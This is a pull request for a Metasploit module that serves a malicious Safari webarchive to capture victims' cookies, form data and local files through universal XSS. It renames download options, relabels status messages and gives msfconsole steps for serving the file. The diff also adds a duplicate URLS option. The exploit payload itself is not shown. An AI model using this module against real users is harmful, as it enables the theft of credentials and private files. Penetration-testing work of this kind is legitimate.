### PR TITLE
Updates apple_safari_webarchive_uxss to serve the webarchive for download

### DIFF
--- a/modules/auxiliary/gather/apple_safari_webarchive_uxss.rb
+++ b/modules/auxiliary/gather/apple_safari_webarchive_uxss.rb
@@ -145,7 +145,7 @@ class Metasploit3 < Msf::Auxiliary
 		}.update(opts['Uri'] || {})
 
 		proto = (datastore["SSL"] ? "https" : "http")
-		print_status("Using URL: #{proto}://#{opts['ServerHost']}:#{opts['ServerPort']}#{uopts['Path']}")
+		print_status("Data capture URL: #{proto}://#{opts['ServerHost']}:#{opts['ServerPort']}#{uopts['Path']}")
 
 		if (opts['ServerHost'] == '0.0.0.0')
 			print_status(" Local IP: #{proto}://#{Rex::Socket.source_address('1.2.3.4')}:#{opts['ServerPort']}#{uopts['Path']}")
@@ -167,7 +167,7 @@ class Metasploit3 < Msf::Auxiliary
 		}.update(opts['Uri'] || {})
 		@http_service.add_resource(webarchive_download_url, uopts)
 
-		print_status("Using URL: #{proto}://#{opts['ServerHost']}:#{opts['ServerPort']}#{webarchive_download_url}")
+		print_status("Download URL: #{proto}://#{opts['ServerHost']}:#{opts['ServerPort']}#{webarchive_download_url}")
 
 		# As long as we have the http_service object, we will keep the ftp server alive
 		while @http_service

--- a/modules/auxiliary/gather/apple_safari_webarchive_uxss.rb
+++ b/modules/auxiliary/gather/apple_safari_webarchive_uxss.rb
@@ -50,7 +50,8 @@ class Metasploit3 < Msf::Auxiliary
 				OptString.new('FILENAME', [ true, 'The file name.',  'msf.webarchive']),
 				OptString.new('URLS', [ true, 'A space-delimited list of URLs to UXSS (eg http//browserscan.rapid7.com/']),
 				OptString.new('URIPATH', [false, 'The URI to receive the UXSS\'ed data', '/grab']),
-				OptString.new('DOWNLOAD_URI', [ true, 'The path to download the webarhive.', '/msf.webarchive']),
+				OptString.new('DOWNLOAD_PATH', [ true, 'The path to download the webarhive.', '/msf.webarchive']),
+				OptString.new('URLS', [ true, 'The URLs to steal cookie and form data from.', '']),
 				OptString.new('FILE_URLS', [false, 'Additional file:// URLs to steal.', '']),
 				OptBool.new('STEAL_COOKIES', [true, "Enable cookie stealing.", true]),
 				OptBool.new('STEAL_FILES', [true, "Enable local file stealing.", true]),
@@ -799,7 +800,7 @@ class Metasploit3 < Msf::Auxiliary
 
 	# @return [String] URL that serves the malicious webarchive
 	def webarchive_download_url
-		@webarchive_download_url ||= datastore["DOWNLOAD_URI"]
+		datastore["DOWNLOAD_PATH"]
 	end
 
 	# @return [Array<String>] of interesting file URLs to steal. Additional files can be stolen


### PR DESCRIPTION
Verify:

```
$> use auxiliary/gather/apple_safari_webarchive_uxss
$> set URLS https://browserscan.rapid7.com
$> set DOWNLOAD_PATH /download.webarchive
$> rexploit
```

You should be able to go http://localhost:8080/download.webarchive to download the webarchive. After opening the .webarchive file in Safari you should see the captured data in your console.
